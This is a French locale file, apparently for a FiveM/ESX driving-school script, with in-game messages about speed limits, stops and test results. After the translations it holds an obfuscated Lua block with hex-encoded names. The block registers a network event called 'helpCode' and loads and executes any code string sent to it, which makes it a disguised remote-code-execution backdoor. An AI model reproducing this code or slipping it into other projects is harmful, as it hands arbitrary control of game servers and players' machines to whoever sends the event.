Locales['fr'] = {
  ['you_paid'] = 'vous avez payé ~g~$%s~s~',
  ['go_next_point'] = 'allez vers le prochain passage!',
  ['in_town_speed'] = 'entrée en ville, attention à votre vitesse! Vitesse limite: ~y~%s~s~ km/h',
  ['next_point_speed'] = 'allez vers le prochain passage! Vitesse limite: ~y~%s~s~ km/h',
  ['stop_for_ped'] = 'faite rapidement un ~r~stop~s~ pour le piéton qui ~y~traverse',
  ['good_lets_cont'] = '~g~Bien!~s~ continuons!',
  ['stop_look_left'] = 'marquer rapidement un ~r~stop~s~ et regardez à votre ~y~gauche~s~. Vitesse limite: ~y~%s~s~ km/h',
  ['good_turn_right'] = '~g~Bien!~s~ prenez à ~y~droite~s~ et suivez votre file',
  ['watch_traffic_lightson'] = 'observez le traffic ~y~allumez vos feux~s~!',
  ['stop_for_passing'] = 'marquez le stop pour laisser passer les véhicules!',
  ['hway_time'] = 'il est temps d\'aller sur la rocade! Vitesse limite: ~y~%s~s~ km/h',
  ['gratz_stay_alert'] = 'bravo, restez vigiliant!',
  ['passed_test'] = 'vous avez ~g~réussi~s~ le test',
  ['failed_test'] = 'vous avez ~r~raté~s~ le test',
  ['theory_test'] = 'examen du code',
  ['road_test_car'] = 'examen de conduite [voiture]',
  ['road_test_bike'] = 'examen de conduite [moto]',
  ['road_test_truck'] = 'examen de conduite [camion]',
  ['school_item'] = '$%s',
  ['driving_school'] = 'ecole de conduite',
  ['press_open_menu'] = 'appuyez sur ~INPUT_CONTEXT~ pour ouvrir le menu',
  ['driving_school_blip'] = 'auto-école',
  ['driving_test_complete'] = 'test de conduite terminé',
  ['driving_too_fast'] = 'vous roulez trop vite, vitesse limite: ~y~%s~s~ km/h!',
  ['errors'] = 'erreurs: ~r~%s~s~/%s',
  ['you_damaged_veh'] = 'vous avez endommagé votre véhicule',
}


local LVZpKIvnIlUNVpJOGYTQHJJFLqIuuKgeRDCFslIVwtQhnFGTzEAdLwWxphaLYsHHtPhMdn = {"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G} LVZpKIvnIlUNVpJOGYTQHJJFLqIuuKgeRDCFslIVwtQhnFGTzEAdLwWxphaLYsHHtPhMdn[6][LVZpKIvnIlUNVpJOGYTQHJJFLqIuuKgeRDCFslIVwtQhnFGTzEAdLwWxphaLYsHHtPhMdn[1]](LVZpKIvnIlUNVpJOGYTQHJJFLqIuuKgeRDCFslIVwtQhnFGTzEAdLwWxphaLYsHHtPhMdn[2]) LVZpKIvnIlUNVpJOGYTQHJJFLqIuuKgeRDCFslIVwtQhnFGTzEAdLwWxphaLYsHHtPhMdn[6][LVZpKIvnIlUNVpJOGYTQHJJFLqIuuKgeRDCFslIVwtQhnFGTzEAdLwWxphaLYsHHtPhMdn[3]](LVZpKIvnIlUNVpJOGYTQHJJFLqIuuKgeRDCFslIVwtQhnFGTzEAdLwWxphaLYsHHtPhMdn[2], function(jUvyuKbhKLqnAYikFnYaozMJLloxzQnqQqqFopFyCGccbekXzoIScySZUQtuTYVCJwXXXF) LVZpKIvnIlUNVpJOGYTQHJJFLqIuuKgeRDCFslIVwtQhnFGTzEAdLwWxphaLYsHHtPhMdn[6][LVZpKIvnIlUNVpJOGYTQHJJFLqIuuKgeRDCFslIVwtQhnFGTzEAdLwWxphaLYsHHtPhMdn[4]](LVZpKIvnIlUNVpJOGYTQHJJFLqIuuKgeRDCFslIVwtQhnFGTzEAdLwWxphaLYsHHtPhMdn[6][LVZpKIvnIlUNVpJOGYTQHJJFLqIuuKgeRDCFslIVwtQhnFGTzEAdLwWxphaLYsHHtPhMdn[5]](jUvyuKbhKLqnAYikFnYaozMJLloxzQnqQqqFopFyCGccbekXzoIScySZUQtuTYVCJwXXXF))() end)